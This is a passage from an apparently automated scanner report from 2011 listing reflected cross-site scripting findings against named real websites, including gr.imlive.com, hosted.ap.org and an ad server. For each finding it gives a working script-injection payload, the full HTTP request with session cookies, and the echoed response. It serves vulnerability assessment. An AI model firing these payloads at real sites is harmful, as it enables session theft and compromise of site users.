Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:31 GMT
Connection: close
Content-Length: 24865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=81248"><script>alert(1)</script>dd3960e35d8&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.447. http://gr.imlive.com/waccess/ [from parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gr.imlive.com
Path:	/waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 855e3"><script>alert(1)</script>7145c8255ab was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=855e3"><script>alert(1)</script>7145c8255ab&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:35 GMT
Connection: close
Content-Length: 24865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=855e3"><script>alert(1)</script>7145c8255ab&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.448. http://gr.imlive.com/waccess/ [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gr.imlive.com
Path:	/waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d7c5'onerror%3d'alert(1)'1cb395fc54c was submitted in the gotopage parameter. This input was echoed as 2d7c5'onerror='alert(1)'1cb395fc54c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=2d7c5'onerror%3d'alert(1)'1cb395fc54c HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: igr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQRQRCTC=GAOPGJMAIPBIPMLIPIDNAHJF; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:31 GMT
Connection: close
Content-Length: 8306
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=gr.imlive.com&ul=/waccess/2d7c5'onerror='alert(1)'1cb395fc54c/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://gr.imlive.com:80/waccess/2d7c5'onerror='alert(1)'1cb395fc54c/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.449. http://gr.imlive.com/waccess/ [promocode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gr.imlive.com
Path:	/waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1c5"><script>alert(1)</script>6962831ce28 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA55833e1c5"><script>alert(1)</script>6962831ce28&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:26 GMT
Connection: close
Content-Length: 24865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA55833e1c5"><script>alert(1)</script>6962831ce28&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.450. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html [CN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Issue detail

The value of the CN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18784"%3balert(1)//b6df280b1f1 was submitted in the CN parameter. This input was echoed as 18784";alert(1)//b6df280b1f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP70718784"%3balert(1)//b6df280b1f1&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:49:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<script type="text/javascript">

var apLink="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/indexreturns.html?CN=AP70718784";alert(1)//b6df280b1f1&Idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE";

function SetPage(lastNum, action)
{

   document.frmSort.action = apLink;
   document.frmSort.method = "Post";

   var firstRecN = 0;

   var
...[SNIP]...

4.451. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html [CN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Issue detail

The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c866d"><script>alert(1)</script>e14b1d4bb59 was submitted in the CN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707c866d"><script>alert(1)</script>e14b1d4bb59&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:49:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<form name="FormAPTop" method=get action="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707c866d"><script>alert(1)</script>e14b1d4bb59.html" style="margin:0px;">
...[SNIP]...

4.452. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html [idx parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Issue detail

The value of the idx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9585c"%3balert(1)//dd20765be50 was submitted in the idx parameter. This input was echoed as 9585c";alert(1)//dd20765be50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&idx=29585c"%3balert(1)//dd20765be50&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:50:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:50:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<script type="text/javascript">

var apLink="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/indexreturns.html?CN=AP707&Idx=29585c";alert(1)//dd20765be50&SITE=MABOH&SECTION=DJSP_COMPLETE";

function SetPage(lastNum, action)
{

   document.frmSort.action = apLink;
   document.frmSort.method = "Post";

   var firstRecN = 0;

   var NUMRECORD
...[SNIP]...

4.453. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html [idx parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Issue detail

The value of the idx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c63db"><script>alert(1)</script>5f8144f9788 was submitted in the idx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&idx=2c63db"><script>alert(1)</script>5f8144f9788&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:50:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:50:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<form name="frmSort" Action="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/indexreturns.html?CN=AP707&Idx=2c63db"><script>alert(1)</script>5f8144f9788&SITE=MABOH&SECTION=DJSP_COMPLETE" method="post" ID="Form1">
...[SNIP]...

4.454. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html [CN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

Issue detail

The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17227"><script>alert(1)</script>9990806bf60 was submitted in the CN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP70717227"><script>alert(1)</script>9990806bf60&ticker= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:49:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:54 GMT
Content-Length: 32723
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<form name="FormAPTop" method=get action="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP70717227"><SCRIPT>ALERT(1)</SCRIPT>9990806BF60.html" style="margin:0px;">
...[SNIP]...

4.455. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html [ticker parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

Issue detail

The value of the ticker request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c61"><script>alert(1)</script>7231934c67 was submitted in the ticker parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker=e6c61"><script>alert(1)</script>7231934c67 HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:50:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:50:05 GMT
Content-Length: 32582
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<input type=text name="ticker" maxlength=100 value="e6c61"><script>alert(1)</script>7231934c67" class=InputTicker>
...[SNIP]...

4.456. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html [CN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html

Issue detail

The value of the CN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ca15'%3balert(1)//242f072a60e was submitted in the CN parameter. This input was echoed as 9ca15';alert(1)//242f072a60e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html?CN=AP7079ca15'%3balert(1)//242f072a60e&valid=NO&set=new&view=quote&ticker= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

4.457. http://hpi.rotator.hadj7.adjuggler.net/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68108<script>alert(1)</script>2a6b507c2b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico68108<script>alert(1)</script>2a6b507c2b0 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X00631Sh00PZ

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 17:24:03 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /favicon.ico68108<script>alert(1)</script>2a6b507c2b0 not found</pre>
<BR>

4.458. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eb1f0<script>alert(1)</script>7dc5a16144 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servleteb1f0<script>alert(1)</script>7dc5a16144/ajrotator/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:46:05 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servleteb1f0<script>alert(1)</script>7dc5a16144/ajrotator/ not found</pre>
<BR>

4.459. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70655<script>alert(1)</script>47968bcc251 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator70655<script>alert(1)</script>47968bcc251/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:46:07 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator70655<script>alert(1)</script>47968bcc251/ not found</pre>
<BR>

4.460. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27cbd<script>alert(1)</script>6907b2da62a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet27cbd<script>alert(1)</script>6907b2da62a/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:46:05 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet27cbd<script>alert(1)</script>6907b2da62a/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ not found</pre>
...[SNIP]...

4.461. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ba19b<script>alert(1)</script>14c865a5c05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotatorba19b<script>alert(1)</script>14c865a5c05/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:46:05 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
